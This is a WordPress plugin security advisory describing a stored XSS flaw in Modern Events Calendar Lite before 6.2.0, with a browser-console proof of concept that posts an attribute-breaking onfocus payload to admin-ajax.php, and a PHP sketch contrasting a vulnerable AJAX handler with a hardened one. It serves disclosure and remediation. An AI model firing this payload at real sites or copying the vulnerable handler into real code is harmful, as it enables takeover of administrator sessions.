WordPress Plugin Vulnerabilities

Modern Events Calendar Lite < 6.2.0 - Subscriber+ Category Add Leading to Stored XSS

Description

The plugin allowed any logged-in user, even a subscriber, to add a category whose parameters are incorrectly escaped in the admin panel, leading to stored XSS.

Proof of Concept

1. Run the following JavaScript in the browser's web console as a subscriber user.
2. Authenticate in a separate browser as an admin user.
3. Go to "M.E. Calendar" -> Categories -> and click on the "category" link.


fetch("http://127.0.0.1:8001/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "body": new URLSearchParams({"action":"mec_popup_event_category","mec_cat_color": 'color" onfocus=alert(1) autofocus=', "category": "category", "mec_cat_icon": "icon"}),
  "method": "POST",
  "credentials": "include"
})
  .then(response => response.text())
  .then(data => console.log(data));
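As an added illustration that is not the plugin's own code, the pattern the advisory describes and the corresponding fix, written as a WordPress AJAX handler. The handler names, nonce action and option key are assumptions; only the pattern (an action reachable by any logged-in user whose stored value is later printed into an HTML attribute unescaped) follows the description above.

```php
<?php
// Added illustration, not the plugin's code. Handler names, nonce action and
// option key are assumptions; the pattern follows the advisory text.

// Vulnerable pattern: wp_ajax_* is reachable by any authenticated user, the
// value is stored without validation and echoed into an attribute unescaped.
add_action('wp_ajax_mec_example_category_vuln', function () {
    $color = isset($_POST['mec_cat_color']) ? $_POST['mec_cat_color'] : '';
    update_option('mec_example_cat_color', $color); // no capability check, no sanitizing
    wp_die();
});

function mec_example_render_vuln() {
    $color = get_option('mec_example_cat_color', '');
    // A value containing a double quote closes the attribute and injects new ones.
    echo '<input type="text" value="' . $color . '">';
}

// Hardened pattern: verify a nonce, require a capability a subscriber lacks,
// accept only a valid hex colour, and escape for the attribute context on output.
add_action('wp_ajax_mec_example_category_fixed', function () {
    check_ajax_referer('mec_example_cat_nonce', 'nonce');
    if (!current_user_can('manage_categories')) {
        wp_send_json_error('forbidden', 403);
    }
    $raw = isset($_POST['mec_cat_color']) ? wp_unslash($_POST['mec_cat_color']) : '';
    // Allow-list: #rgb or #rrggbb only, so quotes and event handlers never get stored.
    if (!preg_match('/^#([A-Fa-f0-9]{3}){1,2}$/', $raw)) {
        wp_send_json_error('invalid color', 400);
    }
    update_option('mec_example_cat_color', $raw);
    wp_send_json_success();
});

function mec_example_render_fixed() {
    $color = get_option('mec_example_cat_color', '');
    // esc_attr() encodes the quote as &quot;, so the value cannot break out of the attribute.
    echo '<input type="text" value="' . esc_attr($color) . '">';
}
```

Input validation alone is not enough if the same value is ever rendered elsewhere, so the output escaping in the render function is the part that actually closes the XSS.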

Classification

Type
XSS

Miscellaneous

Original Researcher
Krzysztof Zając
Submitter
Krzysztof Zając
Verified
Yes

Timeline

Publicly Published
2021-12-03
Added
2021-12-14
Last Updated
2022-04-12